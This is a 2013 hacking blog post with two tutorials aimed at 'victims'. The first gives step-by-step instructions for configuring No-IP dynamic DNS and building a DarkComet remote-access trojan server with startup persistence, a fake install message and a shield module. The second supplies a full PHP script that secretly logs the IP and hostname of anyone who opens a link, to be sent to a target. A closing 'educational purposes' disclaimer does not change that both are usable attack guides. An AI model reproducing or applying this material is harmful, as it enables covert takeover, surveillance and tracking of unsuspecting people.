Monday 20 May 2013

Remote Administration Tools

A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers in the Internet or across a local network. A remote administration tool is based on the server and client technology. The server part runs on a controlled computer and receives commands from the client, which is installed on other remote host. A remote administration tool works in background and hides from the user. The person who controls it can monitor user’s activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, turn off or restart a computer.

https://www.youtube.com/watch?feature=player_embedded&v=5EHNEJMKJdU


  • Go on http://www.no-ip.com/, Create your Account and click on "Download".
  • Now Click on "Windows
  • Now Click on "Download 3.0.4"
  • Now you must install No-DUP 3.0, Click on "Next"
  • Now, choose "Install Location" and click on "Next"
  • Now choose "Start Menu Folder" and Click on "Install"
  • Setup was completed successfully, click on "Close"
  • Now, go on http://www.no-ip.com/ and click on "Login" then type your Email and your Password.
  • Now, click on "Add a Host"
  • Choose a "Hostname", enter your IP address and click on "Create Host".
  •  Done, Now open No-IP DUC 3.0 and enter your email and your password and click on "OK"
  • Now, Select your "HOST" and click on "Save".
  • Done, you can close No-IP DUC 3.0
  • Download DarkComet v4.0 here and run DarkComet. 
  • Click on [+], Choose your port (I advice 1604) and click on "Listen".
  • Now click on "Settings".
  • Click on "Mo-IP Updater" and type your No-IP informations.
  • Now you will edit your server, click on "Edit Server" and click on "Network Settings", enter your informations and click on "Test network".
  • Click on "Module Startup" and choose your settings.
  • Click on "Install Message" and choose your fake message.
  • Now click on "Module Shield" and choose your settings.
  • Now click on "Build Module" and click on "Build Server".
  • See the Results

    Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

How To Grab Someone IP Address ?


I will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.


Copy the below codes into Notepad and save it as Grab.php (.php is must)

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>

Now make Free account on any of the free web hosting sites Ripway or on My3gb .

Now upload Grab.php to your web hosting site.

Copy the link of your uploaded file and send it to victim.

As soon as victim will click on your link his ip will be saved in your free web hosting site.

Enjoy you are Done !!

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.